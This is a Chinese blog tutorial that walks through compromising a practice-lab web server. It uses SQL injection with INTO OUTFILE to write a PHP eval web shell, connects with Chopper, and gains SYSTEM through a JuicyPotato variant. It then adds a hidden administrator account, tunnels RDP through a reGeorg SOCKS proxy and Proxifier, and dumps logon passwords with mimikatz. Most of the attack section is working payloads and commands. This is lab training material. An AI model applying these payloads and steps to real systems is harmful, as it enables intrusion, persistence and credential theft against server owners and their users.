sql获得权限,内网穿透获取管理员密码(小宇特详解)

最新推荐文章于 2023-04-20 08:30:00 发布
最新推荐文章于 2023-04-20 08:30:00 发布
阅读量705 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/119295368
版权

sql获得权限内网穿透获取管理员密码

SQL注入拿webshell(into outfile into dumpfle)

先输入?id=1和?id=2

在这里插入图片描述
在这里插入图片描述

如果id=1能回显 id=2不能回显,id=2-1能回显,说明有sql注入

在这里插入图片描述

sql注入其实可以写webshell的

into outfile 导出文件

into dumpfile 导出文件

将查询的结果导出成文件

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,2 into outfile ‘C:/phpStudy/WWW/123456.txt’

在这里插入图片描述

webshell管理工具

菜刀,蚁剑=>一句话木马直接相连(默认流量没有加密)

冰蝎,哥斯拉=>流量有加密,只能上传他自己的木马

这里在sql注入点注入一句话木马

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile ‘C:/phpStudy/WWW/4448.php’

在这里插入图片描述

提权辅助页面,查询系统可能存在的漏洞

这里将直接用菜刀连接,连接密码为8,连接后打开虚拟终端,这里先看一下权限whoami

在这里插入图片描述

当我们遇到不是管理员权限的时候我们肯定需要提权

1.利用目标主机上的服务提权(目标主机运行的xxx软件,但是这个软件有漏洞可以利用)

2.利用web服务(一台机器上可能有多个网站,多个web容器)

3.利用windows漏洞systeminfo找补丁,找没有打的补丁

在虚拟终端中输入systeminfo来查看系统信息

在这里插入图片描述

这个是一个windows提权辅助工具https://i.hacking8.com/tiquan/

在这里插入图片描述

将systeminfo查到的已打的补丁,查询得到没有打的补丁。然后根据靶机的型号来在github上找到这个cve的漏洞进行操作。

利用魔改版烂土豆提权

这里有一个提权神器。烂土豆。这里可以通过烂土豆来提权

将烂土豆的exe文件,拖入到目录中改名(因为这里的原来的文件名太长了)。在虚拟终端中打开1111.exe(这里改成了1111.exe)。

在这里插入图片描述

直接输入1111.exe -p "whoami"来进行提权。

在这里插入图片描述

这里已经成了系统权限。

这里通过烂土豆来用系统命令来进行生成一个新的用户

在这里插入图片描述

这里可以在网上搜索windows cmd修改管理员权限

net localgroup administrators 用户名 /add

这里1111.exe -p “net localgroup administrators xhy /add”

在这里插入图片描述

这里已经提权了

内网传透(通过reg来设置中转站,然后用全局代理远程桌面)

远程桌面只有管理员可以连接

netstat -ano来查看端口

在这里插入图片描述

cmd命令mstrc远程桌面连接

在这里插入图片描述

你在这里将创建的管理员账号输入,发现登不上。这里是什么原因呢。刚刚咱们找到的那台机器是windows2008,现在是2003这是为什么呢

这就像域名的核心是ip,一个ip底下可能有多台服务器,这些服务器就共用了一个ip,这个的核心是端口映射,这里解释一下什么是端口映射,相当于是有3个主机ABC连在了一个路由器上,这里说网关吧,假如A主机开的3389端口,而B主机不开的3389端口,这样从外网你用3389访问,网关就会让你访问A主机,是永远不可能访问到B主机的。

这里使用了php作为了中间的媒介(PHP可以帮助我们发起请求)

这里使用正向连接:请求=>php=>发送出去 这里的php就相当于一个间谍

将后缀为php的reGeorg这个tunnel.nosocket.php放到菜刀的目录中,也就是网站的目录中。

在这里插入图片描述

改个好写的名字访问一下

在这里插入图片描述

出现这种样子说明就ok了

在这个目录下cmd一下,这里运行python环境,这里我的是py2,这个只有py2能运行,py3就不行了,这个reGrorg是基于py2的。这里输入python reGeorgSocksProxy.py

在这里插入图片描述

然后这里会有一些指令,python reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/2222.php -p 5242(-u后加那个文件的位置,-p后加端口映射的端口)

在这里插入图片描述

等这个运行开以后还得用一个全局流量代理将3389远程桌面连接的请求发到5242端口

全局代理

这里的全局代理用的是Proxifier。

在这里插入图片描述

点开配置文件的代理服务器,地址设置为本地127.0.0.1 端口为5242 协议为socks5。然后检查。

在这里插入图片描述

接下来这里添加一个规则,名称就写mstsc,应用程序是mstsc.exe,这里的动作用代理也就是proxy SOCKS5 127.0.0.1另一个direct的意思是不拦截。

在这里插入图片描述

点击确定。

在菜刀的虚拟终端中,ipconfig一下,发现主机是10.0.1.4

mstsc远程连接一下,这里用自己添加的管理员账户xhy 和 A1B2C3!.Qa登录

登录后用管理员权限打开2.exe

log生成日志

在这里插入图片描述

提升权限privilege :: debug

抓取密码sekurlsa :: logonpasswords

在这里插入图片描述

在这里插入图片描述

小宇特详解
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
内网穿透访问 SQL Server 数据库(详细教程)
06-12
内网穿透访问 SQL Server 数据库(详细教程)
樱花内网穿透管理面板-完整
最新发布
09-09
樱花内网穿透管理面板是一款专为用户解决内网访问问题的工具,允许用户在外部网络环境中访问位于内网的服务器或设备。这个标题表明我们正在讨论一个完整的版本,可能包含了所有必要的功能和组件,以便用户可以顺利地...
Linux无root权限普通账号部署内网穿透工具cpolar
andrey200002的博客
03-07 1884
对于一个服务器的绝大多数账户而言,都是普通账户。服务器处在内网时,无法从公网进行访问,这是就需要使用cpolar内网穿透工具进行访问。 本文的目的是教授用户一种新方法:不需要使用root权限,通过源码下载编译安装的方式部署cpolar软件,实现内网穿透公网访问。
FRP内网穿透配置
weixin_53106424的博客
04-14 2394
chmod 777 ./frps # 说明: chmod 777 [程序命令名称]
内网渗透---获取管理员密码 几种方式
热门推荐
|独自望海。。。
07-09 1万+
很多朋友问我是怎么抓对方的hash再破解的,因此这里我给大家写一篇获取管理员密码的文章,我一般不喜欢在服务器留木马或是后门,我比较喜欢利用管理员进入的方式来管理服务器.本来想主要讲一下抓hash和跑hash的方法,其实主要是写给菜鸟朋友看的,高手请略过,想了想还是分几类来写.1.通过社会工程学获得管理员密码社会工程学获得管理员密码,主要是注入点猜表取管理员密码;通过we
[内网渗透]—提权后抓取密码
Sentiment的博客
12-08 728
抓取本地SAM文件中的密码 从注册表中导出抓取到指定文件后,即可传入mimikatz抓取密码成功抓取到密码hashCMD5解密得到密码
SQL Server 数据库之角色、管理权限
程序员小白的博客
03-24 9569
角色、管理权限1. 角色1.1 概述1.2 预定义角色1.3 角色的操作2. 管理权限 1. 角色 1.1 概述 一个数据库可能会有许多个用户,若单独给每个用户设置管理权限,会浪费很多时间;角色就是集中管理权限的一种机制,它能将不同权限的用户分类组合,便于数据库管理员管理; 1.2 预定义角色 SQL Server 中有两类预定义的角色,系统管理预定义角色和数据库预定义角色,这两类预定义角色将系统管理和数据库管理的权限做了分解,方便数据库管理员分配使用; 当中,较为特殊的是 public 角色,它的权限是所
SqlServer数据库管理员账号SA密码清除工具
08-06
每次遇到一些忘记SQL的sa密码的客户,没办法连接服务器,真的很头痛,要去一步步的做,才可以清除密码, 为了方便,本人做了这个一键清除的小工具, 呵呵,如果好用,别忘记了给我评一句哦,谢谢 测试过SQL2000、...
NCC1909系统管理员和普通用户密码重置与解锁oracle脚本.sql
10-22
NCC1909系统管理员和普通用户密码重置与解锁oracle脚本,登陆数据库用户,先执行生成密钥函数,然后执行更新脚本即可.
sql数据库管理员账号SA密码清除破解工具
03-28
每次遇到一些忘记密码的用户,真的很头痛,要去一步步的做,才可以清除密码,为了方便,本人做了个小工具, 呵呵 测试过SQL2000、MSDE2000 测试过SQL2005 全部通过,一点即除,百分百成功,只需3秒
内网穿透实现在外远程SQL Server数据库 - Windows环境
若有所执,必有所成,心之所向,必显光芒
04-20 3833
内网穿透实现在外远程SQL Server数据库 - Windows环境
通过SQL手工注入拿到管理员密码--辛巴猫舍
ningmini的博客
05-20 1942
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
windows系统sql server常见提权方法
Bird&Bird
07-24 2300
目录1、MSSQL概述2、常规使用3、xp_cmdshell提权4、sp_oacreate提权 1、MSSQL概述 MSSQL(MicroSoft SQL Server数据库),是微软开发的关系型数据库管理系统DBMS,是一个较大型的数据库,提供数据库的从服务器到终端的完整的解决方案,数据库管理系统SSMS(SQL Server Managerment Studio),是一个用于建立、使用和维护数据库的集成开发环境。 端口号:1433 SA用户 在搭建时,选择使用SQL Server身份验证会创建SA账户并
公网远程连接windows SQL Server数据库【内网穿透
12-30 4150
接下来使用cpolar实现在公网环境下远程连接局域网sqlserver,无需公网IP,也不用设置路由器,操作简单,支持http/https/tcp协议,还不限制流量。隧道创建成功后,点击左侧的状态——在线隧道列表,可以看到刚刚所创建成功的隧道,已经有生成了相应的公网地址,将其复制下来,注意:无需复制。访问cpolar官网,进入下载页面,点击下载安装包到本地,并双击安装包,一路默认安装即可。安装完成打开,输入复制的公网ip地址,点击连接,注意:把端口号前面的逗号改为冒号。下载完成后打开并点击运行。
SQL(9)变量:系统变量和自定义变量
Lee_Yu_Rui的博客
07-27 350
第一部分的内容: SQL(2)DQL语言 条件查询+排序查询+常见函数+分组查询+连接查询 https://blog.csdn.net/Lee_Yu_Rui/article/details/107527594 SQL(3)DQL语言 子查询+分页查询+联合查询 https://blog.csdn.net/Lee_Yu_Rui/article/details/107566293 SQL(4)DML语言 增删改 https://blog.csdn.net/Lee_Yu_Rui/article/det
使用SQL语句获取登录用户权限
zgqtxwd的专栏
04-26 1025
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
如何通过注入SQL语句获取网站管理权限安全措施(转)
07-07 5213
出自:http://www.2cto.com/Article/201104/88122.html    我们知道网站后台需要验证用户的输入, 如果不这样做, 用户甚至可以输入一些SQL语句操作后台的数据库, 这么好玩的事情一直没有真正体验过. 前几日学校搞了一个"你最喜欢的辅导员"投票活动, 网站估计是给某个学生团队做的, 结果经同学破解了这个网站的管理员帐号和密码, 我遂向他请教了原理, 也了
利用SQL注入获取服务器最高权限
weixin_33730836的博客
11-01 2176
单位有台数据库服务器(windows 2000 操作系统,sql server 2000)前段时间莫名其妙的被***了跑到机房,通过PE进去一看,发现多了一个账户(SQLDEBUG)。并且administrator账户被禁用了看看数据没少,也没太在意。利用PE把账户破解了一下,就回单位了今晚回来刚好要去数据库服务器上,下个数据库备份文件。结果发现密码又登陆不了。不祥预感出来...
ack123打靶记录
lightsec
03-20 4848
前言: 此靶场是月师傅九月出师考核靶场,搭建过程参考文章红队考核靶场ack123下载和搭建 靶场地址:https://pan.baidu.com/s/13g_1FFg-ZYYpBwkCvKyYWQ提取码:7fkj 靶场拓扑图: 靶场的主要考点: 1.站库分离 外网打点 2.过360全家桶 3.过windwos defender 4.过火绒 5.内网漫游 6.多层网络渗透 7.横向渗透 8.jwt token密钥破解 9.权限提升 10.域渗透 11.phpmyadm..
你在代码中只获得了目标用户的外网ip,那怎么连接到用户呢,不是还要获取用户内网ip吗
07-17
非常抱歉,我之前的回答有误。确实,在Java中只获得目标用户的外网IP是无法直接连接到用户的内网IP的。如果要从外部网络发送消息到内网IP,需要进行一些额外的配置和技术。 一种常见的方法是使用端口映射或端口转发技术,将外部网络的请求转发到内网IP上的特定端口。这样,你可以通过外网IP和映射的端口来访问用户的内网IP。 以下是一种可能的解决方案: 1. 在目标用户所在的网络中,配置一个路由器或防火墙来实现端口映射或端口转发。这可能需要与网络管理员或运营商联系,以便获取必要的权限和配置。 2. 设置端口映射规则,将外部网络的请求转发到目标用户的内网IP和指定的端口上。通常,这可以通过路由器或防火墙的管理界面完成。 3. 在Java代码中,使用目标用户的外网IP和映射的端口号来建立连接,并发送消息。代码示例可以参考我之前提供的答案。 请注意,这种方法涉及到网络配置和安全性问题,需要确保合适的权限和授权。此外,还需要注意防火墙、网络规则以及目标用户网络环境的限制。最好在与网络专家或管理员的指导下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值